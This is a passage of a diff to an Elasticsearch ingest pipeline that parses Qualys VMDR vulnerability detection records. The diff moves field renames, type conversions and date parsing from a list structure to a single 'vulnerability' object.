{{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.PORT != null + field: qualys_vmdr.asset_host_detection.vulnerability.PORT + target_field: qualys_vmdr.asset_host_detection.vulnerability.port + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_PORT_to_long_1 + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS_FACTORS?.QDS_FACTOR != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS_FACTORS.QDS_FACTOR + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_FACTORS_QDS_FACTOR_1 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors ignore_missing: true - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_PROTOCOL - processor: - rename: - field: _ingest._value.PROTOCOL - tag: rename_qualys_vmdr_asset_host_detection_list_PROTOCOL_1 - target_field: _ingest._value.protocol - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_FQDN - processor: - rename: - field: _ingest._value.FQDN - tag: rename_qualys_vmdr_asset_host_detection_list_FQDN_1 - target_field: _ingest._value.fqdn - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_FQDN - processor: - append: - field: related.hosts - tag: append_qualys_vmdr_asset_host_detection_list_fqdn_into_related_hosts_1 - value: '{{{_ingest._value.fqdn}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_INSTANCE - processor: - rename: - field: _ingest._value.INSTANCE - tag: rename_qualys_vmdr_asset_host_detection_list_INSTANCE_1 - target_field: _ingest._value.instance - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_SERVICE - processor: - rename: - field: _ingest._value.SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_SERVICE_1 - target_field: _ingest._value.service - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_AFFECT_RUNNING_KERNEL - processor: - rename: - field: _ingest._value.AFFECT_RUNNING_KERNEL - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_KERNEL_1 - target_field: _ingest._value.affect.running.kernel - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_AFFECT_RUNNING_SERVICE - processor: - rename: - field: _ingest._value.AFFECT_RUNNING_SERVICE - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_RUNNING_SERVICE_1 - target_field: _ingest._value.affect.running.service - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_AFFECT_EXPLOITABLE_CONFIG - processor: - rename: - field: _ingest._value.AFFECT_EXPLOITABLE_CONFIG - tag: rename_qualys_vmdr_asset_host_detection_list_AFFECT_EXPLOITABLE_CONFIG_1 - target_field: _ingest._value.affect.exploitable_config - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_ASSET_CVE - processor: - rename: - field: _ingest._value.ASSET_CVE - tag: rename_qualys_vmdr_asset_host_detection_list_ASSET_CVE_1 - target_field: _ingest._value.asset_cve - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_QID - processor: - rename: - field: _ingest._value.QID - tag: rename_qualys_vmdr_asset_host_detection_list_QID_1 - target_field: _ingest._value.qid - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_RESULTS - processor: - rename: - field: _ingest._value.RESULTS - tag: rename_qualys_vmdr_asset_host_detection_list_RESULTS_1 - target_field: _ingest._value.results - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_STATUS - processor: - rename: - field: _ingest._value.STATUS - tag: rename_qualys_vmdr_asset_host_detection_list_STATUS_1 - target_field: _ingest._value.status - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_TYPE - processor: - rename: - field: _ingest._value.TYPE - tag: rename_qualys_vmdr_asset_host_detection_list_TYPE_1 - target_field: _ingest._value.type - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_QDS - processor: - rename: - field: _ingest._value.QDS - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_1 - target_field: _ingest._value.qds - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_qds_#text - processor: - rename: - field: _ingest._value.qds.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_#text_1 - target_field: _ingest._value.qds.text - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_SSL - processor: - rename: - field: _ingest._value.SSL - tag: rename_qualys_vmdr_asset_host_detection_list_SSL_1 - target_field: _ingest._value.ssl - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_FIRST_FOUND_DATETIME - processor: - date: - field: _ingest._value.FIRST_FOUND_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_FIRST_FOUND_DATETIME_1 - target_field: _ingest._value.first.found_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_FIRST_REOPENED_DATETIME - processor: - date: - field: _ingest._value.FIRST_REOPENED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_FIRST_REOPENED_DATETIME_1 - target_field: _ingest._value.first.reopened_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_FOUND_DATETIME - processor: - date: - field: _ingest._value.LAST_FOUND_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_FOUND_DATETIME_1 - target_field: _ingest._value.last.found_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_REOPENED_DATETIME - processor: - date: - field: _ingest._value.LAST_REOPENED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_REOPENED_DATETIME_1 - target_field: _ingest._value.last.reopened_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_PROCESSED_DATETIME - processor: - date: - field: _ingest._value.LAST_PROCESSED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_PROCESSED_DATETIME_1 - target_field: _ingest._value.last.processed_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_TEST_DATETIME - processor: - date: - field: _ingest._value.LAST_TEST_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_TEST_DATETIME_1 - target_field: _ingest._value.last.test_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_UPDATE_DATETIME - processor: - date: - field: _ingest._value.LAST_UPDATE_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_UPDATE_DATETIME_1 - target_field: _ingest._value.last.update_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_date_LAST_FIXED_DATETIME - processor: - date: - field: _ingest._value.LAST_FIXED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_FIXED_DATETIME_1 - target_field: _ingest._value.last.fixed_datetime - formats: - - ISO8601 - ignore_failure: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_CONVERT_SEVERITY - processor: - convert: - field: _ingest._value.SEVERITY - target_field: _ingest._value.severity - tag: convert_qualys_vmdr_asset_host_detection_list_SEVERITY_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_IS_IGNORED - processor: - convert: - field: _ingest._value.IS_IGNORED - target_field: _ingest._value.is_ignored - tag: convert_qualys_vmdr_asset_host_detection_list_IS_IGNORED_to_boolean - type: boolean - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_IS_DISABLED - processor: - convert: - field: _ingest._value.IS_DISABLED - target_field: _ingest._value.is_disabled - tag: convert_qualys_vmdr_asset_host_detection_list_IS_DISABLED_to_boolean - type: boolean - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_TIMES_FOUND - processor: - convert: - field: _ingest._value.TIMES_FOUND - target_field: _ingest._value.times.found - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_FOUND_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_TIMES_REOPENED - processor: - convert: - field: _ingest._value.TIMES_REOPENED - target_field: _ingest._value.times.reopened - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_REOPENED_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_convert_PORT - processor: - convert: - field: _ingest._value.PORT - target_field: _ingest._value.port - tag: convert_qualys_vmdr_asset_host_detection_list_PORT_to_long_1 - type: long - ignore_missing: true - on_failure: - - append: - field: error.message - value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_QDS_FACTOR - processor: - rename: - field: _ingest._value.QDS_FACTORS.QDS_FACTOR - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_FACTORS_QDS_FACTOR_1 - target_field: _ingest._value.qds_factors - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_inside_foreach - processor: - foreach: - field: _ingest._value.qds_factors - ignore_missing: true - tag: foreach_nested - processor: - rename: - field: _ingest._value.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_1 - target_field: _ingest._value.text - ignore_missing: true - - foreach: - field: qualys_vmdr.asset_host_detection.list - if: ctx.qualys_vmdr?.asset_host_detection?.list instanceof List - tag: foreach_rename_qds_factors_#text + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds_factors != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors + ignore_missing: true + tag: foreach_nested processor: rename: - field: _ingest._value.qds_factors.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_2 - target_field: _ingest._value.qds_factors.text + field: _ingest._value.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_1 + target_field: _ingest._value.text ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.QDS_FACTORS.QDS_FACTOR - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_FACTORS_QDS_FACTOR_2 - target_field: qualys_vmdr.asset_host_detection.list.qds_factors + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds_factors != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.text + ignore_missing: true + - rename: + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS_FACTORS?.QDS_FACTOR != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS_FACTORS.QDS_FACTOR + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_FACTORS_QDS_FACTOR_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.qds_factors.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_3 - target_field: qualys_vmdr.asset_host_detection.list.qds_factors.text + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds_factors != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_3 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors.text ignore_missing: true - foreach: - field: qualys_vmdr.asset_host_detection.list.qds_factors - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.qds_factors instanceof List + field: qualys_vmdr.asset_host_detection.vulnerability.qds_factors + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.qds_factors instanceof List tag: foreach_rename_#text processor: rename: field: _ingest._value.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_factors_#text_4 + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_factors_#text_4 target_field: _ingest._value.text ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.QDS - tag: rename_qualys_vmdr_asset_host_detection_list_QDS_2 - target_field: qualys_vmdr.asset_host_detection.list.qds + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.QDS != null + field: qualys_vmdr.asset_host_detection.vulnerability.QDS + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_QDS_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds ignore_missing: true - rename: - field: qualys_vmdr.asset_host_detection.list.qds.#text - tag: rename_qualys_vmdr_asset_host_detection_list_qds_#text_2 - target_field: qualys_vmdr.asset_host_detection.list.qds.text + if: ctx.qualys_vmdr?.asset_host_detection?.vulnerability?.qds != null + field: qualys_vmdr.asset_host_detection.vulnerability.qds.#text + tag: rename_qualys_vmdr_asset_host_detection_vulnerability_qds_#text_2 + target_field: qualys_vmdr.asset_host_detection.vulnerability.qds.text ignore_missing: true - convert: - field: qualys_vmdr.asset_host_detection.list.PORT - target_field: qualys_vmdr.asset_host_detection.list.port - tag: convert_qualys_vmdr_asset_host_detection_list_PORT_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.PORT + target_field: qualys_vmdr.asset_host_detection.vulnerability.port + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_PORT_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.PORT != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.PORT != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: - field: qualys_vmdr.asset_host_detection.list.TIMES_FOUND - target_field: qualys_vmdr.asset_host_detection.list.times.found - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_FOUND_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_FOUND + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.found + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_FOUND_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_FOUND != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_FOUND != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: - field: qualys_vmdr.asset_host_detection.list.TIMES_REOPENED - target_field: qualys_vmdr.asset_host_detection.list.times.reopened - tag: convert_qualys_vmdr_asset_host_detection_list_TIMES_REOPENED_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.TIMES_REOPENED + target_field: qualys_vmdr.asset_host_detection.vulnerability.times.reopened + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_TIMES_REOPENED_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_REOPENED != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.TIMES_REOPENED != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: - field: qualys_vmdr.asset_host_detection.list.SEVERITY - target_field: qualys_vmdr.asset_host_detection.list.severity - tag: convert_qualys_vmdr_asset_host_detection_list_SEVERITY_to_long_2 + field: qualys_vmdr.asset_host_detection.vulnerability.SEVERITY + target_field: qualys_vmdr.asset_host_detection.vulnerability.severity + tag: convert_qualys_vmdr_asset_host_detection_vulnerability_SEVERITY_to_long_2 type: long ignore_missing: true - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.SEVERITY != '' + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.SEVERITY != '' on_failure: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_UPDATE_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_UPDATE_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_UPDATE_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_UPDATE_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.update_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_UPDATE_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_UPDATE_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_UPDATE_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.update_datetime formats: - ISO8601 on_failure: @@ -1277,10 +1183,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_FIXED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_FIXED_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FIXED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_FIXED_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.fixed_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FIXED_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FIXED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_FIXED_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.fixed_datetime formats: - ISO8601 on_failure: @@ -1288,10 +1194,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_TEST_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_TEST_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_TEST_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_TEST_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.test_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_TEST_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_TEST_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_TEST_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.test_datetime formats: - ISO8601 on_failure: @@ -1299,10 +1205,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_PROCESSED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_PROCESSED_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_PROCESSED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_PROCESSED_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.processed_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_PROCESSED_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_PROCESSED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_PROCESSED_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.processed_datetime formats: - ISO8601 on_failure: @@ -1310,10 +1216,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_FOUND_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_FOUND_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_FOUND_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.found_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_FOUND_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_FOUND_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.found_datetime formats: - ISO8601 on_failure: @@ -1321,10 +1227,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.LAST_REOPENED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_LAST_REOPENED_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.LAST_REOPENED_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.last.reopened_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_LAST_REOPENED_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.LAST_REOPENED_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.LAST_REOPENED_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.last.reopened_datetime formats: - ISO8601 on_failure: @@ -1332,10 +1238,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.FIRST_FOUND_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_FIRST_FOUND_DATETIME_2 - if: (!(ctx.qualys_vmdr?.asset_host_detection?.list instanceof List)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.list.FIRST_FOUND_DATETIME != '' - target_field: qualys_vmdr.asset_host_detection.list.first.found_datetime + field: qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME + tag: date_qualys_vmdr_asset_host_detection_vulnerability_FIRST_FOUND_DATETIME_2 + if: (!(ctx.qualys_vmdr?.asset_host_detection?.vulnerability != null)) && ctx.qualys_vmdr?.asset_host_detection?.list?.FIRST_FOUND_DATETIME != null && ctx.qualys_vmdr.asset_host_detection.vulnerability.FIRST_FOUND_DATETIME != '' + target_field: qualys_vmdr.asset_host_detection.vulnerability.first.found_datetime formats: - ISO8601 on_failure: @@ -1343,10 +1249,10 @@ processors: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: - field: qualys_vmdr.asset_host_detection.list.FIRST_REOPENED_DATETIME - tag: date_qualys_vmdr_asset_host_detection_list_FIRST_REOPENED_DATETIME_2 - if: 